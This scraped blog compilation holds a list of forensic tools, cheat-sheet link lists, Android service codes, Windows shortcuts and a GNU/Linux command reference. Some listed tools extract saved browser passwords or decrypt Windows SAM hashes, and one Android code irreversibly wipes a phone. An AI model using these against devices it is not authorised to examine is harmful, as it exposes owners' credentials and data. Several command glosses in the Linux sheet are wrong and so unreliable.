ivMeta :
Extracts phone model and software version and created date and GPS data from iPhone videos.
http://www.csitech.co.uk/ivmeta-iphone-metadata/
————————————————————————————————————–
Last SIM Details :
Parses physical flash dumps and Nokia PM records to find details of previously inserted SIM cards.
http://lastsimdetails.blogspot.co.uk/p/downloads.html
————————————————————————————————————–
Rubus :
Deconstructs Blackberry .ipd backup files
http://www.cclgroupltd.com/Buy-Software/rubus-ipd-de-constructor-utility.html
————————————————————————————————————–
SAFT :
Obtain SMS Messages, call logs and contacts from Android devices
http://www.signalsec.com/saft/
————————————————————————————————————–
7. Data analysis suites

————————————————————————————————————–
Autopsy :
Graphical interface to the command line digital investigation analysis tools in The Sleuth Kit (see below)
http://www.sleuthkit.org/autopsy/
————————————————————————————————————–
Backtrack :
Penetration testing and security audit with forensic boot capability
http://www.backtrack-linux.org/
————————————————————————————————————–
Caine :
Linux based live CD, featuring a number of analysis tools
http://www.caine-live.net/
————————————————————————————————————–
Deft :
Linux based live CD, featuring a number of analysis tools
http://www.deftlinux.net/
————————————————————————————————————–
Digital Forensics Framework :
Analyses volumes, file systems, user and applications data, extracting metadata, deleted and hidden items
http://www.digital-forensic.org/
————————————————————————————————————–
Forensic Scanner :
Automates ‘repetitive tasks of data collection’. Fuller description here
https://github.com/appliedsec/forensicscanner
————————————————————————————————————–
Paladin :
Ubuntu based live boot CD for imaging and analysis
http://www.sumuri.com/
————————————————————————————————————–
SIFT :
VMware Appliance pre-configured with multiple tools allowing digital forensic examinations
http://computer-forensics.sans.org/community/downloads/
————————————————————————————————————–
The Sleuth Kit :
Collection of UNIX-based command line file and volume system forensic analysis tools
http://www.sleuthkit.org/sleuthkit/
————————————————————————————————————–
Volatility Framework :
Collection of tools for the extraction of artefacts from RAM
http://www.volatilityfoundation.org/
————————————————————————————————————–

8. Internet analysis

http://www.nirsoft.net/utils/mzcv.html
————————————————————————————————————–
MozillaHistoryView :
Reads the history.dat of Firefox/Mozilla/Netscape Web browsers, and displays the list of all visited Web page
http://www.nirsoft.net/utils/mozilla_history_view.html
————————————————————————————————————–
MyLastSearch :
Extracts search queries made with popular search engines (Google, Yahoo and MSN) and social networking sites (Twitter, Facebook, MySpace)
http://www.nirsoft.net/utils/my_last_search.html
————————————————————————————————————–
PasswordFox :
Extracts the user names and passwords stored by Mozilla Firefox Web browser
http://www.nirsoft.net/utils/passwordfox.html
————————————————————————————————————–
OperaCacheView :
Reads the cache folder of Opera Web browser, and displays the list of all files currently stored in the cache
http://www.nirsoft.net/utils/opera_cache_view.html
————————————————————————————————————–
OperaPassView :
Decrypts the content of the Opera Web browser password file, wand.dat
http://www.nirsoft.net/utils/opera_password_recovery.html
————————————————————————————————————–
Web Historian :
Reviews list of URLs stored in the history files of the most commonly used browsers
http://www.mandiant.com/resources/download/web-historian
————————————————————————————————————–
Web Page Saver :
Takes list of URLs saving scrolling captures of each page. Produces HTML report file containing the saved pages
http://info.magnetforensics.com/web-page-saver
————————————————————————————————————–

9. Registry analysis

————————————————————————————————————–
AppCompatCache Parser :
Dumps list of shimcache entries showing which executables were run and their modification dates. Further details.
http://binaryforay.blogspot.co.uk/p/software.html
————————————————————————————————————–
ForensicUserInfo :
Extracts user information from the SAM, SOFTWARE and SYSTEM hives files and decrypts the LM/NT hashes from the SAM file
http://www.woanware.co.uk/forensics/forensicuserinfo.html
————————————————————————————————————–
Process Monitor :
Examine Windows processes and registry threads in real time
http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx
————————————————————————————————————–
RECmd :
Command line access to offline Registry hives. Supports simple & regular expression searches as well as searching by last write timestamp. Further details.
http://binaryforay.blogspot.co.uk/p/software.html
————————————————————————————————————–
Registry Decoder :
For the acquisition, analysis, and reporting of registry contents
http://www.digitalforensicssolutions.com/registrydecoder/
————————————————————————————————————–
Registry Explorer :
Offline Registry viewer. Provides deleted artefact recovery, value slack support, and robust searching. Further details.
http://binaryforay.blogspot.co.uk/p/software.html
————————————————————————————————————–
RegRipper :
Registry data extraction and correlation tool
http://regripper.wordpress.com/
————————————————————————————————————–
Regshot :
Takes snapshots of the registry allowing comparisons e.g., show registry changes after installing software
http://sourceforge.net/projects/regshot/files/
————————————————————————————————————–
ShellBags Explorer  :
Presents visual representation of what a user’s directory structure looked like. Additionally exposes various timestamps (e.g., first explored, last explored for a given folder. Further details.
http://binaryforay.blogspot.co.uk/p/software.html
————————————————————————————————————–
USB Device Forensics :
Details previously attached USB devices on exported registry hives
http://www.woanware.co.uk/forensics/usbdeviceforensics.html
————————————————————————————————————–
USB Historian :
Displays 20+ attributes relating to USB device use on Windows systems
http://www.4discovery.com/our-tools/
————————————————————————————————————–
USBDeview :
Details previously attached USB devices
http://www.nirsoft.net/utils/usb_devices_view.html
————————————————————————————————————–
User Assist Analysis :
Extracts SID, User Names, Indexes, Application Names, Run Counts, Session, and Last Run Time Attributes from UserAssist keys
http://www.4discovery.com/our-tools/
————————————————————————————————————–
UserAssist :
Displays list of programs run, with run count and last run date and time
http://blog.didierstevens.com/programs/userassist/
————————————————————————————————————–
Windows Registry Recovery :
Extracts configuration settings and other information from the Registry
http://www.mitec.cz/wrr.html
————————————————————————————————————–
10. Application analysis

————————————————————————————————————–
Dropbox Decryptor :
Decrypts the Dropbox filecache.dbx file which stores information about files that have been synced to the cloud using Dropbox
http://info.magnetforensics.com/dropbox-decryptor
————————————————————————————————————–
Google Maps Tile Investigator :
Takes x,y,z coordinates found in a tile filename and downloads surrounding tiles providing more context
http://info.magnetforensics.com/google-maps-tile-investigator
————————————————————————————————————–
KaZAlyser :
Extracts various data from the KaZaA application
http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software
————————————————————————————————————–
LiveContactsView :
View and export Windows Live Messenger contact details
http://www.nirsoft.net/utils/live_messenger_contacts.html
————————————————————————————————————–
SkypeLogView :
View Skype calls and chats
http://www.nirsoft.net/utils/skype_log_view.html
————————————————————————————————————–

tv - programer

 

I know personally, I am not one of those people that can remember every detail of every language and never look anything up. It’s nice to have a cheat sheet with a quick summary of some of the most commonly used procedures, tags, tools, syntax, etc., saving time that would have been used to look it up on Google or dig through documentation either online or in printed text. The following is a list of links to several different cheat sheets on a wide variety of tasks and tools.

You can print them out and hang them on your wall (my personal choice) or simply bookmark them for easy access down the road. If you have any additional suggestions or see something I have missed, let me know…

 

Command Line

Windows Command Line Reference

BASH Command Line Reference

DOS Commands

 

Databases

MySQL Cheat Sheet

MySQL Reference List

Oracle Cheat Sheet

Oracle PL/SQL Cheat Sheet

Oracle 9i Server Reference (PDF)

Oracle 9i Command Reference

PostgreSQL Cheat Sheet

SQL Cheat Sheet

SQL Server 2005 Commands

 

Programming

Ada Syntax Card (PDF)

ASP/VBScript Cheat Sheet

C++ Language Summary

C++ Reference Sheet (PDF)

C++ Containers Cheat Sheet

C# Language Reference

Delphi Technical Reference Card (PDF)

Java Syntax Cheat Sheet

Java Quick Reference (PDF)

Java Reference for C++

JSP 2.0 Syntax Reference Sheet (PDF)

LaTEX Reference Card (PDF)

PERL Cheat Sheet

PERL Reference Card (PDF)

PERL Regular Expression Quick Reference (PDF)

PERL Reference Guide

PHP Cheat Sheet

PHP Developer Cheat Sheet

Python 101 Cheat Sheet

Python Cheat Sheet

Python Quick Reference (PDF)

Ruby Cheat Sheet (PDF)

Ruby Reference

Ruby on Rails Reference Sheet

 

Unix/Linux

Debian Linux Reference Guide (PDF)

Linux Shortcuts and Commands

One Page Linux Manual (PDF)

TCP Ports List

Treebeard’s Unix Cheat Sheet

Unix Command Line Tips

 

Web Development

Actionscript 2.0 Cheat Sheet (PDF)

Actionscript 3.0 Cheat Sheet (PDF)

CSS Cheat Sheet

CSS 2 Reference Card (PDF)

CSS Reference Sheet

CSS Shorthand Guide

CSS Useful Properties

Drupal 4.7 Cheat Sheet

.htaccess Cheat Sheet

HTML Cheat Sheet

HTML Dom Quick Reference Card (PDF)

Javascript Cheat Sheet

Javascript Quick Reference

Javascript Reference Page

JQuery Cheat Sheet (PDF)

JQuery Reference (PDF)

Mod_Rewrite Cheat Sheet

Scriptaculous Combination Effects Field Guide (PDF)

XHTML Cheat sheet

XHTML Reference

XHTML & HTML Cheat Sheet

XML Syntax Quick Reference (PDF)

XML Schema Reference (PDF)

XSLT and XPath Quick Reference (PDF)

 

Miscellaneous Topics

Ascii Codes Cheat Sheet

CVS Cheat Sheet

Regular Expressions Cheat Sheet

RGB Hex Colour Chart

Subversion Quick Reference (PDF)

Theoretical Computer Science Cheat Sheet (PDF)

UML Quick Reference Card (PDF)

UML Cheat Sheet

Vi Cheat Sheet

Vim Commands Cheat Sheet

XEmacs Commands Cheat Sheet

 

tv - programer

When working on an app or a code, you may often need some reference material that’s where cheatsheets become very useful.

Here we present to you with an A-Z of cheatsheets that are relevant to programmers and developers. It doesn’t cover all languages or databases, but you’ll find most of what you need. If there’s anything missing, feel free to let us know so we can do better.

1. Asynchronous JavaScript And XML (AJAX): This is a group of interrelated web development techniques that are used to create asynchronous web applications on the client side.

2. Apache: If you’re using the Apache HTTP server then this cheat sheet is just what you would need in front of you.

3. Apache Ant: This java library and command line tool is used for automating software build processes.

4. Apache Cassandra: The open source distributed database management system is often the first pick when scalability is a concern.

5. American Standard Code for Information Interchange (ASCII): The most common character encoding scheme.

6. Berkeley DB: Oracle’s Berkeley DB is a fast and reliable option chosen by many developers.

7. Blueprint: This is a cheatsheet on the popular CSS framework/

8. C: In many ways it is the father of some of the most popular programming languages.

9. C#: A cheatsheet on C# never goes to waste. Most programmers learn the language and a cheatsheet always helps.

10. C++: One of the most useful programming languages ever. It is a must learn language for programmers.

11. Calculus and Analysis: Programmers and developers often need to have a good grasp on calculus and analysis in order to build certain types of apps.

12. Clojure: One of the most popular languages running on the Java Virtual Machine.

13. CSS: Cascading Style Sheets along with HTML is the language of the internet.

14. Debian: A cheatsheet on one of the most popular Linux-based distributions.

15. Django: Written in Python, this is an open source web application framework used by many.

16. DOM – Document Object Model: This is the convention used for interacting with objects in XHTML, XML and HTML.

17. Drupal: The open source content management system is highly popular amongst developers/

18. Eclipse: One of the most popular IDEs, used almost everywhere today.

19. Fedora: One of the big daddies from amongst the Linux-based distributions.

20. Firebug: The web development add-on for Mozilla’s Firefox has turned quite a few heads.

21. Git: It doesn’t matter whether you support open source or not, Git needs no introduction.

22. Groovy: This is another programming language that runs on the Java Virtual Machine.

23. Hadoop: Big Data is the future and hence, so is Hadoop.

24. Haskell: This is an open source functional programming language.

25. HTML: Use the Hypertext Markup Language to create your own website.

26. Java: The inescapable language for programmers and developers.

27. JavaScript: The scripting language for the web.

28. jQuery: A feature rich JavaScript library.

29. Linux: Command line tips that Linux users will find useful.

30. Mac OS X: This is a keyboard cheatsheets for Apple’s Mac OS X users.

31. Mathematica: The Wolfram Mathematica is considered to be a very powerful system.

32. MATLAB: This is a high-level technical computing language and interactive environment.

33. MySQL: Some have been losing fait over MySQL, but the database still goes strong.

34. NMAP: You hackers know what this is don’t you?

35. Node.js: This is the pick of the lot for building scalable web

36. Oracle: This is a reference cheat sheet for Oracle’s SQL.

37. Perl: The popular programming language is used in a variety of places.

38. PHP: Not much needs to be said about PHP.

39. PostgreSQL: This is often used as an alternative for MySQL.

40. Python: One of the most popular programming languages available today. It is used in everything from game programming to hacking.

41. Ruby: Another popular programming platform used by many across the globe.

42. Ruby on Rails: This is an open source framework that runs on Ruby.

43. Scala: This is an object-functional programming and scripting language running on the JVM.

44. Shell script

45. SQL – Structured Query Language: The programming language used to manage data stored in relational database systems.

46. SQLite: This is the relational database management system that is held in a C programming library.

47. Ubuntu: Linux for humans. It may be so, but a cheatsheet is still useful.

48. Unicode: This is the standard for encoding in the world of computers.

49. Unix: A cheatsheet for working on the Unix command line.

50. WordPress: The content management system has grown in popularity over time.

51. XHTML: This is an XML markup language. It stands for Extensible HTML.

52. XML: XML stands for Extensible Markup Language and is used by many.

53. .NET: This framework from Microsoft runs primarily on Windows and there is a debate about whether it is open source or not.

 

TV_Android

1. Complete Information About your Phone

*#*#4636#*#*
This code can be used to get some interesting information about your phone and battery. It shows following 4 menus on screen:
• Phone information
• Battery information
• Battery history
• Usage statistics

2. Factory data reset

*#*#7780#*#*
This code can be used for a factory data reset. It’ll remove following things:
• Google account settings stored in your phone
• System and application data and settings
• Downloaded applications
It’ll NOT remove:
• Current system software and bundled application
• SD card files e.g. photos, music files, etc.
Note: Once you give this code, you get a prompt screen asking you to click on “Reset phone” button. So you get a chance to cancel your operation.

3. Format Android Phone

*2767*3855#
Think before you give this code. This code is used for factory format. It’ll remove all files and settings including the internal memory storage. It’ll also reinstall the phone firmware.
Note: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving this code.

4. Phone Camera Update

*#*#34971539#*#*
This code is used to get information about phone camera. It shows following 4 menus:
• Update camera firmware in image (Don’t try this option)
• Update camera firmware in SD card
• Get camera firmware version
• Get firmware update count
WARNING: Never use the first option otherwise your phone camera will stop working and you’ll need to take your phone to service centre to reinstall camera firmware.

5. End Call/Power

*#*#7594#*#*
This one is my favourite one. This code can be used to change the “End Call / Power” button action in your phone. Be default, if you long press the button, it shows a screen asking you to select any option from Silent mode, Airplane mode and Power off.
You can change this action using this code. You can enable direct power off on this button so you don’t need to waste your time in selecting the option.

6. File Copy for Creating Backup

*#*#273283*255*663282*#*#*

This code opens a File copy screen where you can back up your media files e.g. Images, Sound, Video and Voice memo.

7. Service Mode

*#*#197328640#*#*
This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

8. WLAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* – WLAN test (Use “Menu” button to start various tests)

*#*#232338#*#* – Shows Wi-Fi MAC address

*#*#1472365#*#* – GPS test

*#*#1575#*#* – Another GPS test

*#*#232331#*#* – Bluetooth test

*#*#232337#*# – Shows Bluetooth device address

9. Codes to get Firmware version information:

*#*#4986*2650468#*#* – PDA, Phone, H/W, RFCallDate

*#*#1234#*#* – PDA and Phone

*#*#1111#*#* – FTA SW Version

*#*#2222#*#* – FTA HW Version

*#*#44336#*#* – PDA, Phone, CSC, Build Time, Change list number

10. Codes to launch various Factory Tests:

*#*#0283#*#* – Packet Loopback

*#*#0*#*#* – LCD test

*#*#0673#*#* OR *#*#0289#*#* – Melody test

*#*#0842#*#* – Device test (Vibration test and BackLight test)

*#*#2663#*#* – Touch screen version

*#*#2664#*#* – Touch screen test

*#*#0588#*#* – Proximity sensor test

*#*#3264#*#* – RAM version

tv-300x2241

Download the PDF cheat sheet >Caintech.co.uk Windows Shortcuts You Should All Know To Save Time

 

Windows Explorer Keyboard Shortcuts

* END (Display the bottom of the active window)

* HOME (Display the top of the active window)

* NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)

* NUM LOCK+Plus sign (+) (Display the contents of the selected folder)

* NUM LOCK+Minus sign (-) (Collapse the selected folder)

* LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)

* RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)

 

Shortcut Keys for Character Map

* After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:

* RIGHT ARROW (Move to the right or to the beginning of the next line)

* LEFT ARROW (Move to the left or to the end of the previous line)

* UP ARROW (Move up one row)

* DOWN ARROW (Move down one row)

* PAGE UP (Move up one screen at a time)

* PAGE DOWN (Move down one screen at a time)

* HOME (Move to the beginning of the line)

* END (Move to the end of the line)

* CTRL+HOME (Move to the first character)

* CTRL+END (Move to the last character)

* SPACEBAR (Switch between Enlarged and Nor mal mode when a character is selected)

 

Microsoft Management Console (MMC) Main Window Keyboard Shortcuts

* CTRL+O (Open a saved console)

* CTRL+N (Open a new console)

* CTRL+S (Save the open console)

* CTRL+M (Add or remove a console item)

* CTRL+W (Open a new window)

* F5 key (Update the content of all console windows)

* ALT+SPACEBAR (Display the MMC window menu)

* ALT+F4 (Close the console)

* ALT+A (Display the Action menu)

* ALT+V (Display the View menu)

* ALT+F (Display the File menu)

* ALT+O (Display the Favourites menu)

 

MMC Console Window Keyboard Shortcuts

* CTRL+P (Print the current page or active pane)

* ALT+Minus sign (-) (Display the window menu for the active console window)

* SHIFT+F10 (Display the Action shortcut menu for the selected item)

* F1 key (Open the Help topic, if any, for the selected item)

* F5 key (Update the content of all console windows)

* CTRL+F10 (Maximize the active console window)

* CTRL+F5 (Restore the active console window)

* ALT+ENTER (Display the Properties dialog box, if any, for the selected item)

* F2 key (Rename the selected item)

* CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)

 

Remote Desktop Connection Navigation

* CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)

* ALT+PAGE UP (Switch between programs from left to right)

* ALT+PAGE DOWN (Switch between programs from right to left)

* ALT+INSERT (Cycle through the programs in most recently used order)

* ALT+HOME (Display the Start menu)

* CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)

* ALT+DELETE (Display the Windows menu)

* CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)

* CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)

 

Internet Explorer navigation

* CTRL+B (Open the Organize Favourites dialog box)

* CTRL+E (Open the Search bar)

* CTRL+F (Start the Find utility)

* CTRL+H (Open the History bar)

* CTRL+I (Open the Favourites bar)

* CTRL+L (Open the Open dialog box)

* CTRL+N (Start another instance of the browser with the same Web address)

* CTRL+O (Open the Open dialog box, the same as CTRL+L)

* CTRL+P (Open the Print dialog box)

* CTRL+R (Update the current Web page)

* CTRL+W (Close the current window)

 

tv crime2

Ever wondered what the numbers on your credit card mean? Well wonder no longer

CrackingCreditCode

tv-Linux

Following on from a recent post Nmap Cheat Sheet’I have decided to create another cheat sheet but this time for GNU/Linux as I am constantly referring to it for reference. These kind of things are very handy as if you are like myself and don’t use Linux on a daily basis they can play a major part in jogging the little grey cells.

Download:  Cheat Sheet commands for GNU/Linux

CheatSheet commands for GNU / Linux

System Information

1. arch: show the architecture of the machine (1).
2. uname -m: show the architecture of the machine (2)..
3. uname -r: show the kernel version used.
4. dmidecode -q: display the components (hardware) system.
5. hdparm -i /dev/hda: show the characteristics of a hard disk.
6. hdparm -tT /dev/sda: make reading test on a hard disk.
7. cat /proc/cpuinfo: CPU information show.
8. cat /proc/interrupts: show interrupts.
9. cat /proc/meminfo: verify memory usage.
10. cat /proc/swaps: show swap files.
11. cat /proc/version: display the version of the kernel.
12. cat /proc/net/dev: network adapters and display statistics.
13. cat /proc/mounts: display the mounted file system.
14. lspci -tv: show PCI devices.
15. lsusb -tv: show USB devices.
16. date: display the system date.
17. cal 2013: show calendar 2013.
18. cal 07 2013: show the calendar for the month July 2013.
19. date 041217002013.00: place (declare, set) date and time.
20. clock -w: save changes to the BIOS date.

Shutdown (Reset System or Log out)

1. shutdown -h now: Shut down system (1).
2. init 0: Shut down system (2).
3. telinit 0: Shut down system (3).
4. halt: shutdown the system (4).
5. shutdown -h hours:minutes &: planned shutdown of the system.
6. shutdown -c: cancel a planned shutdown of the system.
7. shutdown -r now: Restart (1).
8. reboot: Reboot (2).
9. logout: close session.

Files and Directories

1. cd /home: enter the “home” directory.
2. cd ..: go back one level.
3. cd ../..: back 2 levels.
4. cd: go to the root directory.
5. cd ~user1: go to directory user1.
6. cd -: go (back) to the previous directory.
7. pwd: : show the path of the working directory.
8. ls: see the files in a directory.
9. ls -F: see the files in a directory.
10. ls -l: show details of files and folders in a directory.
11. ls -a: show hidden files.
12. ls *[0-9]*: show the files and folders that contain numbers.
13. tree: display files and folders in a tree starting from the root. (1)
14. lstree: display files and folders in a tree starting from the root. (2)
15. mkdir dir1: create a folder or directory called ‘dir1’.
16. mkdir dir1 dir2: create two folders or directories simultaneously (Create two directories at once)
17. mkdir -p /tmp/dir1/dir2: create a directory tree.
18. rm -f file1: delete the file called file1.
19. rmdir dir1: delete the folder called dir1.
20. rm -rf dir1: delete a folder called dir1 with its contents recursively.
21. rm -rf dir1 dir2: delete two folders (directories) with its contents recursively.
22. mv dir1 new_dir: rename or move a file or folder (directory).
23. cp file1: copy a file.
24. cp file1 file2: copy two files together.
25. cp dir /* . : copy all the files in a directory within the current working directory.
26. cp -a /tmp/dir1 . : copy a directory within the current working directory.
27. cp -a dir1: copy a directory.
28. cp -a dir1 dir2: copy two directories.
29. ln -s file1 lnk1: create a symbolic link to the file or directory.
30. ln file1 lnk1: creating a physical link to the file or directory.
31. touch -t 0712250000 file1: modify the real time (time of creation) of a file or directory.
32. file file1: output (screen dump)
33. iconv -l: lists of known encryption.
34. iconv -f fromEncoding -t toEncoding inputFile > outputFile: creates a new form of the input file is encoded in assuming and making a ToEncoding fromEncoding.
35. find . -maxdepth 1 -name *.jpg -print -exec convert ”{}” -resize 80×60 “thumbs/{}” \;: grouping resized files in the current directory and send them to directories in thumbnail view (requires converting from ImageMagick).

Finding Files

1. find / -name file1: file and directory search from the root of the system.
2. find / -user user1: find files and directories belonging to user user1.
3. find /home/user1 -name \*.bin: search files with extension ‘. bin ‘directory within it’ / home/user1.
4. find /usr/bin -type f -atime +100: look at binary files used in the last 100 days.
5. find /usr/bin -type f -mtime -10: find the changed files created within the last 10 days.
6. find / -name \*.rpm -exec chmod 755 ‘{}’ \;: look for files with extension. ‘rpm’ and change permissions.
7. find / -xdev -name \*.rpm: Find files with extension ‘. rpm’ ignoring them removable devices such as cdrom, pen-drive, etc ….
8. locate \*.ps: find files with extension. ‘ps’ primarily executed with the command ‘updatedb’.
9. whereis halt: show the location of a binary file. In this case you are wondering Where he command ‘halt’
10. which halt: show the full path (full path to it) to a binary / executable.

Mounting a file system

1. mount /dev/hda2 /mnt/hda2: mount a disk called hda2. Check first the existence of the directory ‘/ mnt/hda2?, If not, create it.
2. umount /dev/hda2: removing a disk called hda2. Out first from point ‘/ mnt/hda2.
3. fuser -km /mnt/hda2: force umount when the device is busy.
4. umount -n /mnt/hda2: running disassembly without reading the file / etc / mtab. Useful when the file is read-only or the hard drive is full.
5. mount /dev/fd0 /mnt/floppy: mount a floppy disk (floppy).
6. mount /dev/cdrom /mnt/cdrom: mount a cdrom / dvdrom.
7. mount /dev/hdc /mnt/cdrecorder: mount a rewritable cd or dvdrom.
8. mount /dev/hdb /mnt/cdrecorder: mount a rewritable cd / dvdrom (a dvd).
9. mount -o loop file.iso /mnt/cdrom: mount a file or iso image.
10. mount -t vfat /dev/hda5 /mnt/hda5: mount a FAT32 file system.
11. mount /dev/sda1 /mnt/usbdisk: mount a usb thumb drive or a memory (without specifying the filesystem type).

Hard Disk Space

1. df -h: display a list of mounted partitions.
2. ls -lSr |more: show the size of the files and directories sorted by size.
3. du -sh dir1: Estimate the space used by the directory dir1.
4. du -sk * | sort -rn: show the size of the files and directories sorted by size.
5. rpm -q -a –qf ‘%10{SIZE}t%{NAME}n’ | sort -k1,1n: show space used by the installed rpm packages organized by size (Fedora, Redhat and others).
6. dpkg-query -W -f=’${Installed-Size;10}t${Package}n’ | sort -k1,1n: show space used by the packages installed, organized by size (Ubuntu, Debian and others) .

Users and Groups

1. groupadd name_of_the_group: create a new group.
2. groupdel name_of_the_group: delete a group.
3. groupmod -n new_name_of_the_group old_name_of_the_group: rename a group.
4. useradd -c “Name Surname ” -g admin -d /home/user1 -s /bin/bash user1: Create a new user belonging to the “admin”.
5. useradd user1: create a new user.
6. userdel -r user1: delete a user (‘-r’ eliminates home directory).
7. usermod -c “User FTP” -g system -d /ftp/user1 -s /bin/nologin user1: change user attributes.
8. passwd: Changing password.
9. passwd user1: change the password of a user (only root).
10. chage -E 2013-12-31 user1: place a time limit for the user’s password. In this case says that the key expires on December 31, 2013.
11. pwck: correct syntax check the file format of ‘/ etc / passwd’ and the existence of users.
12. grpck: check correct syntax and format of the file ‘/ etc / group’ and the existence of groups.
13. newgrp group_name: Registers a new group to change the default group of newly created files.

File Permissions (Use “+” to place permissions and “-” to remove)

1. ls -lh: Show permissions.
2. ls /tmp | pr -T5 -W$COLUMNS: Terminal divided into 5 columns.
3. chmod ugo+rwx directory1: : enable read permissions (r) , write (w) and execute (x) to the owner (u) group (g) and others (o) on the directory ‘directory1
4. chmod go-rwx directory1: remove read permission (r), write (w) and (x) running the group (g) and others (o) on the directory ‘directory1
5. chown user1 file1: cchange owner of a file.
6. chown -R user1 directory1: change the owner of a directory and all files and directories contained within.
7. chgrp group1 file1: changing group of files.
8. chown user1:group1 file1: change user and group ownership of a file.
9. find / -perm -u+s: display all system files with SUID configured.
10. chmod u+s /bin/file1: set the SUID bit on a binary file. The user that running that file takes the same privileges as the owner.
11. chmod u-s /bin/file1: disable SUID bit on a binary file.
12. chmod g+s /home/public: place a SGID bit on a directory-similar to SUID but for directory.
13. chmod g-s /home/public: disable SGID bit on a directory.
14. chmod o+t /home/public: place a bit STIKY in a directory. Allows deletion of files only rightful owners.
15. chmod o-t /home/public: STIKY disable bit in a directory.


Special Attributes on files (Use “+” to place permissions and “-” to remove)

1. chattr +a file1: allows to writte by opening a file only append mode.
2. chattr +c file1: allows a file to be compressed / decompressed automatically.
3. chattr +d file1: ensures that the program ignore delete files during backup.
4. chattr +i file1: convert the file unchanged, so it can not be removed, altered, renamed, or bound.
5. chattr +s file1: allows a file to be deleted safely.
6. chattr +S file1: ensures that a file is modified, the changes are written in synchronous mode as with sync.
7. chattr +u file1: allows you to restore the contents of a file even if it is canceled.
8. lsattr: show special attributes.


Compressed files

1. bunzip2 file1.bz2: decompress in file called ‘file1.bz2.
2. bzip2 file1: compress a file called file1.
3. gunzip file1.gz: decompress a file called ‘file1.gz.
4. gzip file1: compress a file called ‘file1.
5. gzip -9 file1: compress with maximum compression.
6. rar a file1.rar test_file: create a zip file called ‘file1.rar’.
7. rar a file1.rar file1 file2 dir1: compress ‘file1,’ file2 and ‘dir1Simultaneously.
8. rar x file1.rar: decompress rar file.
9. unrar x file1.rar: decompress rar file.
10. tar -cvf archive.tar file1: create an uncompressed tarball.
11. tar -cvf archive.tar file1 file2 dir1: create an archive containing ‘file1,file2 and dir1.
12. tar -tf archive.tar: show contents a file.
13. tar -xvf archive.tar: extract a tarball.
14. tar -xvf archive.tar -C /tmp: extract a tarball in / tmp.
15. tar -cvfj archive.tar.bz2 dir1: create a tarball compressed into bzip2.
16. tar -xvfj archive.tar.bz2: decompress a bzip2 compressed tar file.
17. tar -cvfz archive.tar.gz dir1: create a gzip tarball.
18. tar -xvfz archive.tar.gz: decompress a gzip compressed tar archive.
19. zip file1.zip file1: create a zip file.
20. zip -r file1.zip file1 file2 dir1: compress in zip several files and directories simultaneously.
21. unzip file1.zip: decompress a zip file.


RPM Packages (Red Hat, Fedora…etc)

1. rpm -ivh package.rpm: install an rpm package.
2. rpm -ivh –nodeeps package.rpm: installing an rpm package ignoring dependencies requests.
3. rpm -U package.rpm: upgrade a rpm package without changing configuration files.
4. rpm -F package.rpm: upgrade a rpm package only if it is installed.
5. rpm -e package_name.rpm: remove a rpm package.
6. rpm -qa: show all rpm packages installed on the system.
7. rpm -qa | grep httpd: show all rpm packages with the name “httpd”.
8. rpm -qi package_name: get information on a specific package installed.
9. rpm -qg “System Environment/Daemons”: show rpm packages of a software group.
10. rpm -ql package_name: show list of files given by a rpm package installed.
11. rpm -qc package_name: show configuration files list given by a rpm package installed.
12. rpm -q package_name –whatrequires: show list of dependencies required for a rpm package.
13. rpm -q package_name –whatprovides: show the capacity provided by a rpm package.
14. rpm -q package_name –scripts: scripts show started during installation / removal.
15. rpm -q package_name –changelog: display the history of revisions of a rpm package.
16. rpm -qf /etc/httpd/conf/httpd.conf: check which rpm package belongs to a given file.
17. rpm -qp package.rpm -l: show list of files given by a rpm package not yet been installed.
18. rpm –import /media/cdrom/RPM-GPG-KEY: Import digital signature public key.
19. rpm –checksig package.rpm: verify the integrity of a package rpm.
20. rpm -qa gpg-pubkey: verify the integrity of all rpm packages installed.
21. rpm -V package_name: check the file size, licenses, rates, owner, group, check MD5 digest and last modified.
22. rpm -Va: check all rpm packages installed on the system. Use with caution.
23. rpm -Vp package.rpm: verify a rpm package not yet installed.
24. rpm2cpio package.rpm | cpio –extract –make-directories *bin*: extracting executable file from a rpm package.
25. rpm -ivh /usr/src/redhat/RPMS/`arch`/package.rpm: install a package built from a source rpm.
26. rpmbuild –rebuild package_name.src.rpm: build a rpm package from a source rpm.


YUM packages updater (Red Hat, Fedora…etc)

1. yum install package_name: download and install a rpm package..
2. yum localinstall package_name.rpm: This will install an RPM and attempt to resolve all dependencies for you, using your repositories.
3. yum update package_name.rpm: update all rpm packages installed on the system.
4. yum update package_name: upgrade a rpm package.
5. yum remove package_name: remove a rpm package.
6. yum list: list all packages installed on the system.
7. yum search package_name: Find a package repository rpm.
8. yum clean packages: clean a cache erasing downloaded packages.
9. yum clean headers: remove all header files that the system uses to resolve the dependency.
10. yum clean all: delete from the cache packages and header files.

Deb packages (Debian, Ubuntu…etc)

1. dpkg -i package.deb: upgrade a deb package.
2. dpkg -r package_name: remove a deb package.
3. dpkg -l: show all deb packages installed on the system.
4. dpkg -l | grep httpd: show all deb packages with the name “httpd”
5. dpkg -s package_name: to obtain information on a specific package installed on the system.
6. dpkg -L package_name: show list of files given by a package installed on the system.
7. dpkg –contents package.deb: show list of files given by a package not yet installed.
8. dpkg -S /bin/ping: check which package owns a given file.

APT packages updater (Debian, Ubuntu …etc)

1. apt-get install package_name: install / upgrade a deb package.
2. apt-cdrom install package_name: install / upgrade a deb package from cdrom.
3. apt-get update: update the package list.
4. apt-get upgrade: update all installed packages
5. apt-get remove package_name: remove a deb package.
6. apt-get check: check the correct resolution of dependencies.
7. apt-get clean: clean up cache from packages downloaded.
